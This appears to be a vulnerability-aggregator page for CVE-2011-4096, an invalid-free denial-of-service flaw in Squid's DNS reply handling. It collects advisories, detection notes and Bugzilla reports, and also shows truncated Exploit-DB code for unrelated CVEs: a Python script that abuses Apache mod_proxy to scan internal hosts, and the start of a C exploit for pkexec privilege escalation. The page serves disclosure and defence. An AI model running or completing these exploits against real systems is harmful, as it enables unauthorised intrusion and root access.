CVE-2011-4096
published 2011-11-17CVE-2011-4096: The idnsGrokReply function in Squid before 3.1.16 does not properly free memory, which allows remote attackers to cause a denial of service (daemon abort) via…
PriorityP333medium5CVSS 2.0
AVNACLAuNCNINAP
EPSS
38.32%
98.4th percentile
The idnsGrokReply function in Squid before 3.1.16 does not properly free memory, which allows remote attackers to cause a denial of service (daemon abort) via a DNS reply containing a CNAME record that references another CNAME record that contains an empty A record.
Affected
61 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| squid-cache | squid | <= 3.1.15 | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
| squid-cache | squid | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →The vulnerability is triggered by a DNS reply containing a CNAME record that references another CNAME record that contains an empty A record — monitor for such chained CNAME→CNAME→empty-A DNS responses directed at Squid proxy instances. ↗
- →The vulnerable code path is in the idnsGrokReply function within src/dns_internal.cc of Squid — focus process-level monitoring and crash analysis on this function in affected Squid versions (before 3.1.16). ↗
- →The flaw was introduced with IPv6 support in Squid 3.1 (changes to idnsGrokReply); Squid instances without IPv6 support (e.g., RHEL 4/5 builds) are not affected — scope detection to Squid 3.1.x builds with IPv6 enabled. ↗
- →The upstream patch is available at the Launchpad Bazaar repository revision 10384 for the 3.1 branch — use this to identify the exact code delta for writing targeted detection rules or confirming patch status. ↗
- ·Only Squid 3.1.x builds with IPv6 support are affected; Squid as shipped with RHEL 4 and RHEL 5 (which lacked IPv6 support) are explicitly not affected. ↗
- ·The vulnerable merge logic (for AAAA and A result sets) is absent in RHEL 4/5 squid builds, confirming those are safe; detection/patching efforts should focus on Squid 3.1.x with IPv6 enabled. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat5.0MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record
vendor_redhat·2011-06-06·CVSS 5.0
CVE-2011-4096 [MEDIUM] squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record
squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record
The idnsGrokReply function in Squid before 3.1.16 does not properly free memory, which allows remote attackers to cause a denial of service (daemon abort) via a DNS reply containing a CNAME record that references another CNAME record that contains an empty A record.
Statement: This issue did not affect the versions of squid as shipped with Red Hat Enterprise Linux 4 and 5 as they did not include IPv6 support. This issue was introduced with the addition of IPv6 support in Squid 3.1 (in the changes made to the idnsGrokReply function).
Package: squid (Red Hat Enterprise Linux 4) - Not affected
Package: squid (Red Hat Enterprise Linux 5) - Not affected
GHSA
GHSA-g3fq-pgcr-r7w6: The idnsGrokReply function in Squid before 3
ghsa_unreviewed·2022-05-17
CVE-2011-4096 [MEDIUM] GHSA-g3fq-pgcr-r7w6: The idnsGrokReply function in Squid before 3
The idnsGrokReply function in Squid before 3.1.16 does not properly free memory, which allows remote attackers to cause a denial of service (daemon abort) via a DNS reply containing a CNAME record that references another CNAME record that contains an empty A record.
No detection rules found.
Exploit-DB
Apache mod_proxy - Reverse Proxy Exposure
exploitdb·2011-10-11·CVSS 5.0
CVE-2011-3368 [MEDIUM] Apache mod_proxy - Reverse Proxy Exposure
Apache mod_proxy - Reverse Proxy Exposure
---
#!/usr/bin/env python
import socket
import string
import getopt, sys
known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]
def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
get = get + "Host: " + apache_target + "\r\n\r\n"
remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remoteserver.settimeout(3)
try:
remoteserver.connect((apache_target, int(apache_port)))
remoteserver.send(get)
return remoteserver.recv(4096)
except:
return ""
def get_banner(result):
return result[string.find(result, "\r\n\r\n")+4:]
def scan_host(url, apache_target, apache_port,
Exploit-DB
pkexec - Race Condition Privilege Escalation
exploitdb·2011-10-08·CVSS 6.9
CVE-2011-1485 [MEDIUM] pkexec - Race Condition Privilege Escalation
pkexec - Race Condition Privilege Escalation
---
/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx [email protected] * Have fun~
¡Á U can reach us @ http://www.wooyun.org :)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int main(int argc,char *argv[], char ** envp)
{
time_t tim_seed1;
pid_t pid_seed2;
int result;
struct stat stat_buff;
char * chfn_path = "/usr/bin/chfn";
char cmd_buff[4096];
char * pkexec_argv[] = {
"/usr/bin/pkexec",
"/bin/sh",
"-c",
cmd_buff,
NULL
};
int pipe1[2];
int pipe2[2];
int pipe3[2];
pid_t pid,pid2 ;
char * chfn_argv[] = {
"/usr/bin/chfn",
NULL
};
char buff[8];
char read_buff[4096];
char real_path
Bugzilla
CVE-2011-4096 squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record
bugzilla·2011-10-31·CVSS 5.0
CVE-2011-4096 [MEDIUM] CVE-2011-4096 squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record
CVE-2011-4096 squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record
An invalid free flaw was found in the way Squid proxy caching server processed DNS requests, where one CNAME record pointed to another CNAME record pointing to an empty A-record. A remote attacker could issue a specially-crafted DNS request, leading to denial of service (squid daemon abort).
Upstream bug report:
[1] http://bugs.squid-cache.org/show_bug.cgi?id=3237
Relevant upstream patch:
[2] http://bazaar.launchpad.net/~squid/squid/3.1/revision/10384
References:
[3] http://www.squid-cache.org/Versions/v3/3.1/changesets/SQUID_3_1_16.html
[4] http://bugs.squid-cache.org/show_bug.cgi?id=3237#c4
[5] http://bugs.squid-cache.org/show_bug.cgi?id=3237#c5
Discussion
Bugzilla
CVE-2011-4096 squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record [fedora-all]
bugzilla·2011-10-31·CVSS 5.0
CVE-2011-4096 [MEDIUM] CVE-2011-4096 squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record [fedora-all]
CVE-2011-4096 squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?ty
Bugzilla
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
bugzilla·2011-08-30·CVSS 5.0
CVE-2011-3205 [MEDIUM] CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
A flaw was reported [1] in how Squid parsed responses from Gopher servers. This flaw could result in a buffer overflow if a Gopher server were to return a line longer than 4096 bytes, leading to memory corruption and a crash. This flaw is an extension of SQUID-2005:1 (or CVE-2005-0094) in Squid 3.x, due to increased packet read sizes. A malicious user could setup a fake Gopher server and forward requests to it through Squid. A specially crafted response from that server could cause Squid to restart.
This has been corrected in upstream versions 3.2.0.11, 3.1.15, and 3.0.STABLE26. Patches for 3.0 [2], 3.1 [3], and 3.2 [4] are available.
[1] http://www.squid-cache.org/Advisories/SQUID-2011_3.txt
[2] htt
Bugzilla
CVE-2011-2916 freenx-client: qtnx stores configuration, including non-default authentication key, with insecure permissions
bugzilla·2011-08-11·CVSS 5.5
CVE-2011-2916 [MEDIUM] CVE-2011-2916 freenx-client: qtnx stores configuration, including non-default authentication key, with insecure permissions
CVE-2011-2916 freenx-client: qtnx stores configuration, including non-default authentication key, with insecure permissions
It was reported [1] that the qtnx client would store non-custom SSH keys in a world-readable configuration file. If a user did not have a properly secured home directory (if it was world-readable or world-executable), this could allow other users on the local system to obtain the private key used to connect to remote NX sessions.
For example:
% ls -al .qtnx
total 12
drwxrwxr-x. 2 user user 4096 Aug 11 11:36 .
drwxr-x---. 27 user user 4096 Aug 11 11:37 ..
-rw-rw-r--. 1 user user 1209 Aug 11 11:40 cerb.nxml
% grep Auth .qtnx/cerb.nxml
qtnx should probably set the permissions of the *.nxml files to 0600, or the ~/.qtnx/ directory should be mode 0700 (like ~/.ssh/)
http://bugs.squid-cache.org/show_bug.cgi?id=3237#c12http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00010.htmlhttp://lists.opensuse.org/opensuse-security-announce/2016-08/msg00040.htmlhttp://secunia.com/advisories/46609http://secunia.com/advisories/47459http://www.mandriva.com/security/advisories?name=MDVSA-2011:193http://www.openwall.com/lists/oss-security/2011/10/31/5http://www.openwall.com/lists/oss-security/2011/11/01/3http://www.redhat.com/support/errata/RHSA-2011-1791.htmlhttp://www.securitytracker.com/id?1026265http://www.squid-cache.org/Versions/v3/3.1/changesets/SQUID_3_1_16.htmlhttp://bugs.squid-cache.org/show_bug.cgi?id=3237#c12http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00010.htmlhttp://lists.opensuse.org/opensuse-security-announce/2016-08/msg00040.htmlhttp://secunia.com/advisories/46609http://secunia.com/advisories/47459http://www.mandriva.com/security/advisories?name=MDVSA-2011:193http://www.openwall.com/lists/oss-security/2011/10/31/5http://www.openwall.com/lists/oss-security/2011/11/01/3http://www.redhat.com/support/errata/RHSA-2011-1791.htmlhttp://www.securitytracker.com/id?1026265http://www.squid-cache.org/Versions/v3/3.1/changesets/SQUID_3_1_16.html
2011-11-17
Published